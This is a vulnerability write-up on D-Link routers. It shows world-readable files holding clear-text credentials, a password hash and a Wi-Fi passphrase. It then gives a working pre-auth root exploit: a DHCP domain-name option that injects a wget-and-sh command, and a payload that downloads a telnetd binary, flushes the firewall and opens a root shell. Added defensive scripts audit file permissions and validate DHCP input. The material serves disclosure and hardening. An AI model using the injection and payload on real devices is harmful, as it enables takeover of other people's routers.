
D-Link: research on ten 0-day vulnerabilities (with detailed walkthrough)

Source: compiled by this site   Author: anonymous   Date: 2017-09-13
Several sensitive files have weak permissions:
1. /var/passwd
/var/passwd stores user credentials in clear text, and the file is mode -rw-rw-rw- (666).
# ls -la /var/passwd
-rw-rw-rw-    1 root     root           28 Jan  1 00:00 /var/passwd
# cat /var/passwd
"Admin" "password" "0"
2. /var/etc/hnapasswd
An attacker can also recover the clear-text password from /var/etc/hnapasswd; that file is likewise mode -rw-rw-rw- (666).
# cat /var/etc/hnapasswd
Admin:password
# ls -la /var/etc/hnapasswd
-rw-rw-rw-    1 root     root           20 Jan  1 00:00 /var/etc/hnapasswd
3. /etc/shadow
/etc/shadow is a symlink with permissions rwxrwxrwx (777); it points to /var/etc/shadow.
# ls -al /etc/shadow
lrwxrwxrwx    1 root     root           15 Jan 20  2017 /etc/shadow -> /var/etc/shadow
# ls -la /var/etc/shadow
-rw-r--r--    1 root     root           93 Jan  1 00:00 /var/etc/shadow
/var/etc/shadow holds the DES hash of the admin user's password.
# cat /var/etc/shadow
root:!:10956:0:99999:7:::
nobody:!:10956:0:99999:7:::
Admin:zVc1PPVw2VWMc:10956:0:99999:7:::
4. /var/run/storage_account_root
/var/run/storage_account_root contains clear-text credentials.
The file's permissions are -rw-rw-rw- (666).
# ls -la /var/run/storage_account_root
-rw-rw-rw-    1 root     root           40 Jan  1 00:00 /var/run/storage_account_root
# cat /var/run/storage_account_root
admin:password,:::
jean-claude:dusse,:::
5. /var/run/hostapd*
/var/run/hostapd* holds the clear-text wireless passphrase; the files are mode -rw-rw-rw- (666).
# ls -la /var/run/hostapd*
-rw-rw-rw-    1 root     root           73 Jan  1 00:00 /var/run/hostapd-wlan1wps.eap_user
-rw-rw-rw-    1 root     root         1160 Jan  1 00:00 /var/run/hostapd-wlan1.conf
-rw-rw-rw-    1 root     root           73 Jan  1 00:00 /var/run/hostapd-wlan0wps.eap_user
-rw-rw-rw-    1 root     root         1170 Jan  1 00:00 /var/run/hostapd-wlan0.conf
# cat /var/run/hostapd*|grep -i pass
wpa_passphrase=aaaaa00000
wpa_passphrase=aaaaa00000
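A defender-side check to go with the findings above, added here as an example and not part of the original write-up: a POSIX sh audit that parses `ls -la` style output and flags any entry whose mode grants the "other" class read or write access. The path list is the one the findings name; the sample input is constructed in the shape of the write-up's `ls -la` output so the logic can be exercised without the device.

```shell
#!/bin/sh
# Added example: audit sensitive files for world read/write permission.
# Not part of the original write-up; the path list is taken from it, the
# check itself is generic and runs on any POSIX sh (BusyBox included).

# Paths the write-up shows with weak modes; extend as needed.
SENSITIVE_PATHS="/var/passwd /var/etc/hnapasswd /var/etc/shadow /var/run/storage_account_root"

# mode_is_world_accessible MODE
# MODE is the 10-character mode field from `ls -l`, e.g. -rw-rw-rw-.
# Returns 0 if the "other" class may read or write (chars 8 and 9),
# 1 if the mode is well-formed and world-inaccessible, 2 if malformed.
mode_is_world_accessible() {
    case "$1" in
        ???????r??|????????w?) return 0 ;;
        ??????????) return 1 ;;
        *) return 2 ;;
    esac
}

# report_from_ls_output
# Reads `ls -la` lines on stdin and prints "WEAK <mode> <path>" for each
# entry whose mode is world-readable or world-writable. Symlink entries
# (mode starting with l) are skipped: the link target's mode is what counts,
# so audit the target (or use `ls -laL`) instead.
report_from_ls_output() {
    while read -r mode links owner group size mon day hm path rest; do
        case "$mode" in
            l*|'') continue ;;
        esac
        [ -n "$path" ] || continue
        if mode_is_world_accessible "$mode"; then
            echo "WEAK $mode $path"
        fi
    done
}

# audit_paths
# Runs `ls -laL` on each path in SENSITIVE_PATHS (following symlinks) and
# reports the weak ones; missing files are silently skipped.
audit_paths() {
    for p in $SENSITIVE_PATHS; do
        ls -laL "$p" 2>/dev/null | report_from_ls_output
    done
}

# Constructed sample in the shape of the write-up's `ls -la` output.
# Expected: two WEAK lines (/var/passwd is world-writable, /var/etc/shadow
# is world-readable; the symlink is skipped and the 0600 file is fine).
SAMPLE_LS='-rw-rw-rw-    1 root     root           28 Jan  1 00:00 /var/passwd
-rw-r--r--    1 root     root           93 Jan  1 00:00 /var/etc/shadow
lrwxrwxrwx    1 root     root           15 Jan 20  2017 /etc/shadow -> /var/etc/shadow
-rw-------    1 root     root           20 Jan  1 00:00 /var/etc/hnapasswd'

# count_weak_in_sample: number of WEAK lines produced for SAMPLE_LS.
count_weak_in_sample() {
    printf '%s\n' "$SAMPLE_LS" | report_from_ls_output | wc -l | tr -d ' '
}

# Demo run on the constructed sample; on the device, call audit_paths instead.
printf '%s\n' "$SAMPLE_LS" | report_from_ls_output
```

On the router itself, `audit_paths` follows the /etc/shadow symlink and reports /var/etc/shadow as world-readable, which is the finding that matters: the symlink's 777 mode is cosmetic, the target's 644 is what exposes the hash.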
Pre-Auth RCEs as root (L2): details
The DHCP client on the router is vulnerable to command injection.
The dhcpd.conf file on the test DHCP server:
rasp-pwn-dlink# cat /etc/dhcp/dhcpd.conf
option domain-name ";wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re;";
option domain-name-servers 8.8.8.8, 8.8.4.4;
default-lease-time 600;
max-lease-time 7200;
ddns-update-style none;
subnet 10.254.239.0 netmask 255.255.255.224 {
  range 10.254.239.10 10.254.239.20;
  option routers 10.254.239.1;
}
rasp-pwn-dlink# ifconfig eth1
eth1      Link encap:Ethernet  HWaddr 00:0e:c6:aa:aa:aa 
          inet addr:10.254.239.1  Bcast:10.254.239.255  Mask:255.255.255.0
          inet6 addr: fe80::20e:caaa:aaaa:aaa/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:129 errors:0 dropped:0 overruns:0 frame:0
          TX packets:107 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:11181 (10.9 KiB)  TX bytes:49155 (48.0 KiB)
rasp-pwn-dlink# cat /var/www/html/dhcp-rce
#!/bin/sh
wget -O /var/telnetd-dhcpd-wan http://10.254.239.1/dlink-telnetd
chmod 777 /var/telnetd-dhcpd-wan
(for i in 0 1 2 3; do # win races against legit iptables rules
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
sleep 10
done ) &
/var/telnetd-dhcpd-wan -l /bin/sh -p 110 &
rasp-pwn-dlink# dhcpd eth1
Internet Systems Consortium DHCP Server 4.3.1
Copyright 2004-2014 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Config file: /etc/dhcp/dhcpd.conf
Database file: /var/lib/dhcp/dhcpd.leases
PID file: /var/run/dhcpd.pid
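The injection above works because a DHCP-supplied string reaches a shell as command text. As an added example that is not part of the original write-up, here is the client-side mitigation in POSIX sh: a udhcpc-style hook (assumed; the option is taken to arrive in the `domain` environment variable) that accepts only syntactically valid domain names and then passes the value to `printf` as data rather than splicing it into a command string. The sample values are constructed; the injected one is the string from the dhcpd.conf above, handled purely as input to reject.

```shell
#!/bin/sh
# Added example: validate a DHCP-supplied domain-name before a client hook
# script uses it. Not part of the original write-up. Assumes a udhcpc-style
# hook, where the option arrives in the environment variable $domain.
#
# The vulnerable pattern is building a command string from the option, e.g.
#   sh -c "echo search $domain > /etc/resolv.conf"
# which turns a value like ";wget ... ; sh /var/re;" into commands.
# The fix is twofold: accept only syntactically valid names, and pass the
# value as data (a printf argument), never as shell text.

nl=$(printf '\nx'); nl=${nl%x}   # a literal newline for the case pattern below

# is_valid_domain_name NAME
# RFC 1035 shape only: dot-separated labels of [A-Za-z0-9-], 1-63 chars each,
# not starting or ending with '-', total length <= 253, optional trailing dot.
# Spaces, ';', quotes, '/', newlines and anything else are rejected.
is_valid_domain_name() {
    name=$1
    [ -n "$name" ] || return 1
    [ "${#name}" -le 253 ] || return 1
    case "$name" in *"$nl"*) return 1 ;; esac   # a second line could sneak past grep
    printf '%s\n' "$name" | grep -Eq \
      '^([A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.?$'
}

# is_ipv4 ADDR: dotted quad with each octet in 0-255.
is_ipv4() {
    printf '%s\n' "$1" | grep -Eq \
      '^((25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])\.){3}(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])$'
}

# render_resolv_conf NAME DNS...
# Prints resolv.conf content for a validated name and nameserver list.
# Returns 1 and prints nothing if any value fails validation. A real hook
# would redirect this to /etc/resolv.conf; here it only writes to stdout.
render_resolv_conf() {
    name=$1; shift
    is_valid_domain_name "$name" || { echo "dhcp hook: rejected domain-name option" >&2; return 1; }
    for ns in "$@"; do
        is_ipv4 "$ns" || { echo "dhcp hook: rejected nameserver $ns" >&2; return 1; }
    done
    printf 'search %s\n' "$name"
    for ns in "$@"; do
        printf 'nameserver %s\n' "$ns"
    done
}

# Constructed sample values: a legitimate option and the injected value from
# the write-up's dhcpd.conf, used here only as a string that must be rejected.
GOOD_DOMAIN='lan.example.com'
BAD_DOMAIN=';wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re;'

# Demo with the sample values; a real hook would pass "$domain" and $dns.
render_resolv_conf "$GOOD_DOMAIN" 8.8.8.8 8.8.4.4
render_resolv_conf "$BAD_DOMAIN" 8.8.8.8 || echo "injected domain-name value blocked"
```

The allowlist check is the primary control; the `printf '%s'` argument passing is the second layer, so that even a value which somehow passed validation is written as bytes and never re-parsed by the shell.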

